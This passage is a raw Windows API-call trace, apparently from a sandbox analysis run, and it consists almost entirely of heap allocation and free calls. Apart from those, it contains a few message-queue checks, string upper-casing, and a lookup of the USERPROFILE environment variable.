hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0266.399] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0266.399] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0266.399] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0266.399] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0266.399] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b35e0 | out: hHeap=0x25c0000) returned 1 [0266.399] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0266.399] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9390 | out: hHeap=0x25c0000) returned 1 [0266.400] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9390 [0266.400] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0266.400] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0266.400] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6af8 [0266.400] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1848 [0266.400] CharUpperBuffW (in: lpsz="A0F00600E09", cchLength=0xb | out: lpsz="A0F00600E09") returned 0xb [0266.400] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6af8 | out: hHeap=0x25c0000) returned 1 [0266.400] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0266.400] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0266.400] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1848 [0266.400] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0266.400] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0266.400] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0266.400] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0266.400] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0266.400] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0266.400] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0266.400] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0266.401] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0266.401] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17d8 [0266.401] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0266.401] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0266.401] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0266.401] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9f48 [0266.401] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0266.401] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0266.401] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9e58 [0266.401] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0266.401] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf3b0, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0266.401] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0266.401] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0266.401] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1198 [0266.401] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0266.401] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0266.401] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0266.401] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0266.401] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0266.402] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0266.402] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0266.402] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0266.402] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0266.402] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0266.402] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0266.402] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0266.402] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0266.402] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xa0) returned 0x24207f0 [0266.402] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0266.402] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0266.402] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0266.402] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0266.402] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0266.402] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0266.402] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0266.402] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0266.403] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0266.403] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0266.403] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0266.403] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1c38 [0266.403] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0266.403] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0266.403] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0266.403] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0266.403] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0266.403] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0266.403] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0266.403] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x249c7b0 [0266.403] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17b8 [0266.403] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0266.403] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0266.403] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0266.403] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9ea0 [0266.403] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0266.404] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0266.404] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9e58 [0266.404] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0266.404] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf3b0, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0266.404] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0266.404] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0266.404] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0266.404] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0266.404] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0266.404] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0266.404] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0266.404] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0266.404] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0266.404] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0266.404] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0266.404] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0266.404] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0266.404] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0266.404] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0266.404] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0266.405] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xa0) returned 0x2420898 [0266.405] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0266.405] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0266.405] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0266.405] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0266.405] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0266.405] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0266.405] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0266.405] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0266.405] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0266.405] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b17d8 [0266.405] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0266.405] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0266.405] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0266.405] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0266.405] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b17b8 [0266.405] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0266.405] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0266.406] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0266.406] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9f48 [0266.406] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6af8 [0266.406] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0266.406] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2088 [0266.406] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0266.406] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ce0 [0266.406] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0266.406] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0266.406] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0266.406] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0266.406] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1808 [0266.406] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0266.406] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d50 [0266.406] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0266.406] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0266.406] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c18 [0266.406] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0266.406] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0266.407] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0266.407] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c68 [0266.407] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0266.407] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0266.407] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0266.407] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0266.407] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1bc8 [0266.407] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0266.407] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0266.407] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0266.407] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0266.407] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0266.407] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0266.407] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0266.407] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0266.407] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0266.407] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0266.407] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0266.407] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0266.407] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1828 [0266.408] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b78 [0266.408] CharUpperBuffW (in: lpsz="SSA0F00600E09", cchLength=0xd | out: lpsz="SSA0F00600E09") returned 0xd [0266.408] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b78 | out: hHeap=0x25c0000) returned 1 [0266.408] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0266.408] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0266.408] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0266.408] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0266.408] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0266.408] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0266.408] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0266.408] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0266.408] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0266.408] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0266.408] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0266.408] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0266.408] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0266.408] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b78 [0266.408] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0266.408] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0266.409] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17e8 [0266.409] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d00 [0266.409] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0266.409] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1828 [0266.409] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0266.409] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b4870 [0266.409] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0266.409] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0266.409] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0266.409] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0266.409] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0266.409] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0266.409] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c90 [0266.409] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0266.409] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18e8 [0266.409] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0266.409] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0266.409] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0266.409] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0266.410] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b78 | out: hHeap=0x25c0000) returned 1 [0266.410] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0266.410] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0266.410] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0266.410] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0266.410] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0266.410] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0266.410] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b78 [0266.410] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0266.410] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0266.410] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0266.410] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0266.410] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0266.410] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1368 [0266.410] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0266.410] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0266.410] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0266.410] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0266.410] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0266.410] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0266.411] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0266.411] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0266.411] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0266.411] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0266.411] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0266.411] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0266.411] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0266.411] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0266.411] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0266.411] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0266.411] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0266.411] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0266.411] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0266.411] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0266.411] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0266.411] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c40 [0266.411] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0266.411] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17f8 [0266.411] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0266.412] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0266.412] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0266.412] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0266.412] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0266.412] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0266.412] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0266.412] HeapFree (in: 